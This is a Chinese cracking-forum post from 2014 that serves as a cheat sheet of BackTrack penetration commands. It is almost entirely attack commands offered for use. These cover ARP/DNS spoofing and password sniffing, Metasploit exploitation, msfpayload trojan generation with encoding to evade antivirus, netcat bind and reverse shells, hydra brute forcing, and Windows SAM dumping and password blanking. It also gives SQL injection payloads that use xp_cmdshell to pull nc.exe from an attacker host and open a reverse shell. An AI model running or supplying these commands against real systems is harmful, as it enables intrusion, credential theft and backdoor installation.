1401软件安全

 找回密码
 立即注册

QQ登录

只需一步,快速开始

1401软件论坛总版规【新人必看】如何正确发布收费帖子加入vip系统学习仅需398元免费获得1401软件安全论坛vip
开通本站VIP会员请联系QQ 564853771论坛纪念优盘Beyond EXE超强加密器V1.61401论坛破解工具包 2017-9-12
[破解班vip]入门篇[破解班vip]基础篇[破解班vip]脱壳篇[破解班vip]实战篇
[破解班vip]网络验证篇[破解班vip]零基础HOOK教程[破解班vip]零基础易语言入门[破解班vip]零基础c语言入门
[破解班vip]零基础Delphi编程入门[破解班vip]寒假培训课程共7课[破解班vip]破解提高篇[破解班vip]易语言培训课程
[破解班vip]核心技术培训篇[破解班vip]pe格式与pe操作[逆向班vip]汇编语句与反汇编基础[原创课程]c++单文档框架课程
付费破解软件 +Q 564853771待添加...待添加...广告位招租...
查看: 2273|回复: 0

【backtrack常用渗透命令】

[复制链接]
  • TA的每日心情
    开心
    2016-12-31 19:24
  • 签到天数: 148 天

    [LV.7]常住居民III

    335

    主题

    715

    帖子

    1693

    积分

    版主

    【KingSolomon】

    Rank: 14Rank: 14Rank: 14Rank: 14

    UID
    972
    元宝
    339
    威望
    458
    贡献
    19
    信誉值
    0
    精华
    17
    在线时间
    179 小时
    注册时间
    2014-5-16
    最后登录
    2017-1-4
    违规
    0
    积分
    1693

    最佳新人活跃会员热心会员灌水之王论坛元老吾爱富翁工具大师已有小成

    QQ
    发表于 2014-6-16 20:32:17 | 显示全部楼层 |阅读模式
    生活圈制作
    whois 域名/ip 查看域名的详细信息。
    ping 域名/ip 测试本机到远端主机是否联通。
    dig 域名/ip 查看域名解析的详细信息。
    host -l 域名 dns服务器 传输zone。
    查询信息的网站:
    http://centralops.net
    http://www.dnsstuff.com
    http://serversniff.net
    http://news.netcraft.com扫描nmap:
    -sS 半开扫描TCP和SYN扫描。
    -sT 完全TCP连接扫描。
    -sU UDP扫描
    -PS syn包探测(防火墙探测)
    -PA ack包探测(防火墙探测)
    -PN 不ping。
    -n 不dns解析。
    -A -O和-sV。
    -O 操作系统识别。
    -sV 服务版本信息(banner)
    -p 端口扫描。
    -T 设置时间级别(0-5)
    -iL 导入扫描结果。
    -oG 输出扫描结果。
    操作系统识别:
    p0f -i eth0 -U -p 开启混杂模式。
    xprobe2 ip|域名 检测os。
    banner获取:
    nc ip port 检测端口是否打开。
    telnet ip port 检测端口是否打开。
    wget ip 下载主页。
    cat index.html | more 显示主页代码。q 退出。
    windows枚举
    nmap -sS -p 139,445 ip 扫描windows。
    cd /pentest/enumeration/smb-enum
    nbtscan -f targetIP 检测netbios。
    smbgetserverinfo -i targetIP 扫描name,os,组。
    smbdumpusers -i targetIP 列出用户。
    smbclient -L //targetIP 列出共享。
    使用windows:
    net use \\ip\ipc$""/u:"" 开启空会话。
    net view \\ip       显示共享信息。
    smbclient:
    smbclient -L hostName -I targetIP 枚举共享。
    smbclient -L hostName/share -U""用空用户连接。
    smbclient -L hostName -I targetIP -U admin普通用户连接。
    rpcclient:
    rpcclient targetIP -U“”打开一个空会话。
    netshareenum 枚举共享。
    enumdomusers 枚举用户。
    lsaenumsid  枚举域SID。
    queryuser RID 查询用户信息。
    createdomuser 创建用户访问。ARP欺骗:ettercap:
    nano /usr/local/etc/etter.conf配置文件
    Sniff>Unified sniffing>Network interface: eth0>OK 设置抓包的网卡
    Hosts>Scan for hosts (do this two times)扫描网段的主机
    Hosts>Hosts list 显示主机列表
    Select the default gateway>Add to Target 1 添加主机
    Select the target>Add to Target 2 添加主机
    Mitm>Arp poisoning>Sniff remote connections>OK 设置ARP攻击
    Start>Start sniffing 开始攻击
    dsniff -i eth0 监听网卡窃听登录用户密码
    urlsnarf -i eth0 嗅探http请求
    msgsnarf -i eth0 嗅探聊天软件的聊天内容
    driftnet -i eth0 网络管理嗅探图片,音频。dns欺骗:
    nano /usr/local/share/ettercap/etter.dns编辑配置文件
    Plugins>Manage the plugins>dns_spoof 设置dns欺骗
    Mitm>Arp poisoning>Sniff remote connections>OK 设置ARP
    Start>Start sniffing 开始攻击
    Exploits漏洞利用:
    cd /pentest/exploits/exploit-db 进入目录
    cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
    cat exploit | grep"#include"检查运行环境
    cat sploitlist.txt | grep -i exploit | cut -d""-f1 | xargs grep sys | cut -d":"-f1 | sort -u只保留可以在linux下运行的代码
    Metasploit:
    svn update 升级
    ./msfweb Web接口127.0.0.1:55555。.
    ./msfconsole 字符下的Console。help 帮助
    show<option>显示选项
    search<name>搜索名字
    use<exploit name>使用漏洞
    show options 显示选项
    set<OPTION NAME><option>设置选项
    show payloads 显示装置
    set PAYLOAD<payload name>设置装置
    show options 显示选项
    set<OPTION NAME><option>设置选项
    show targets 显示目标(os版本)
    set TARGET<target number>设置目标版本
    exploit 开始漏洞攻击
    sessions -l 列出会话
    sessions -i<ID>选择会话
    sessions -k<ID>结束会话
    <ctrl>z 把会话放到后台
    <ctrl>c 结束会话
    jobs 列出漏洞运行工作
    jobs -K 结束一个漏洞运行工作
    show auxiliary 显示辅助模块
    use<auxiliary name>使用辅助模块
    set<OPTION NAME><option>设置选项
    run 运行模块
    scanner/smb/version 扫描系统版本
    scanner/mssql/mssql_ping 测试mssql是否在线
    scanner/mssql/mssql_login 测试登录(暴力或字典)
    Attacker behind firewall: bind shell正向
    Target behind firewall: reverse shell反向Meterpreter衔接不懂dos的可以用这个:
    db_import_nessus_nbe 加载nessus的扫描结果
    db_import_nmap_xml 加载nmap的扫描结果
    自动化攻击流程:
    cd /pentest/exploit/framework3
    ./msfconsole
    load db_sqlite3
    db_destroy pentest
    db_create pentest
    db_nmap targetIPdb_hosts
    db_services
    db_autopwn -t -p -e
    字符接口攻击流程:
    ./msfcli | grep -i<name>
    ./msfcli<exploit or auxiliary>S
    ./msfcli<exploit name><OPTION NAME>=<option>AYLOAD=<payload name>E
    做木马后门等:
    ./msfpayload<payload><variable=value><output type>
    S    summary and options of payload
    C    C languageP    Perly    Ruby
    R    Raw, allows payload to be piped into msfencode and other tools
    J    JavaScript
    X    Windows executable
    ./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X>evil.exe
    编码处理就是做免杀:
    ./msfencode<options><variable=value>
    ./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b'\x00'-l
    ./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b'\x00'-e PexFnstenvMor -t c
    入侵后在windows下添加管理员用户:
    hostname 查看主机名
    net users 查看用户
    net user 用户 密码 /add 添加用户
    net localgroup 查看工作组
    net localgroup administrators 查看管理员组
    net localgroup administrators x /add 将用户加入管理员组TFTP
    cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
    tftp -i 10.1.1.2 GET nc.exe下载
    netcat瑞士军刀
    attacker: 10.1.1.1
    target: 10.1.1.2
    nc -v -z 10.1.1.2 1-1024 端口扫描
    target: nc -lvp 4444 聊天设置(服务)
    attacker: nc -v 10.1.1.2 4444 聊天设置(客户)
    target: nc -lvp 4444>output.txt传输文件(接受)
    attacker: nc -v 10.1.1.2 4444<test.txt传输文件(发送)
    target: nc -lvp 4444 -e cmd.exe Bind shell。
    attacker: nc -v 10.1.1.2 4444
    target:nc -lvp 4444 Reverse shell。
    attacker:nc -v 10.1.1.2 4444 -e /bin/bash密码
    字典zcat /pentest/password/dictionaries/wordlist.txt.Z>words
    cat words | wc -l显示个数(30多万个)   暴力:
    hydra -l ftp -P words -v targetIP ftp 攻击ftp。
    hydra -l muts -P words -v targetIP pop3 攻击pop3
    hydra -P words -v targetIP snmp 攻击snmp
    攻击microsof VPN
    nmap -p 1723 targetIP
    dos2unix words
    cat words | thc-pptp-bruter targetIPWYD:
    wget -r www.target.com --accept=pdf 下载pdf文档
    wyd.pl -o output.txt www.target.com/
    cat output.txt | more
    SAM文件(windows下的密码文件):
    %SYSTEMROOT%/system32/config
    %SYSTEMROOT%/repair
    备份windows的hash文件:
    ./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
    meterpreter>upload -r /tmp/pwdump6 c:\\windows\\system32\\
    meterpreter>execute -f cmd -c
    meterpreter>interact x
    C:\WINDOWS\system32>pwdump \\127.0.0.1
    john破解密码:
    cp hash.txt /pentest/password/john-1.7.2/run/
    cd /pentest/password/john-1.7.2/run/
    ./john hash.txt彩虹表:
    rcrack *.rt -f hash.txt
    本地修改密码:mount
    umount /mnt/hda1
    modprobe fuse
    ntfsmount /dev/hda1 /mnt/hda1mount
    ls -l /mnt/hda1 挂载c盘
    bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
    samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt>hash.txt 备份sam文件
    直接修改sam文件:
    chntpw /mnt/sda1/WINDOWS/system32/config/SAM
    Blank the password. *
    Do you really wish to change it? y
    Write hive files? y
    unmount /mnt/sda1rebootSQL 注入
    nmap -sS -p 1521 targetIP 扫描oracle
    nmap -sS -p T:1433,U:1434 targetIP 扫描mssql
    'or 1=1--验证旁路列举表名:
    'having 1=1--
    'group by table having 1=1--
    'group by table, table2 having 1=1--
    'group by table, table2, table3 having 1=1--
    列举列类型:
    union select sum(column) from table --
    union select sum(column2) from table --添加数据:
    '; insert into table values('value','value2','value3')--MSSQL存储程序:
    输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。
    '; exec sp_makewebtask"c:\Inetpub\wwwroot\test.html","select * from table"; --
    www.target.com/test.html
    运行ipconfig在浏览器查看信息。
    'or 1=1; exec master..xp_cmdshell'"ipconfig">c:\Inetpub\wwwroot\test.txt';--
    www.target.com/test.txt
    上传后门。
    'or 1=1; exec master..xp_cmdshell'"tftp -i attackIP GET nc.exe&&nc.exe attackIP 53 -e cmd.exe'; --
    攻击者: nc -lvp 53

    本帖被以下淘专辑推荐:

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|手机版|Archiver|1401软件安全 ( ICP备16034480号 )

    GMT+8, 2021-6-13 21:55 , Processed in 0.222441 second(s), 28 queries , Gzip On.

    Powered by Discuz! X3.4

    © 2001-2017 Comsenz Inc. Template By 【未来科技】【 www.wekei.cn 】

    快速回复 返回顶部 返回列表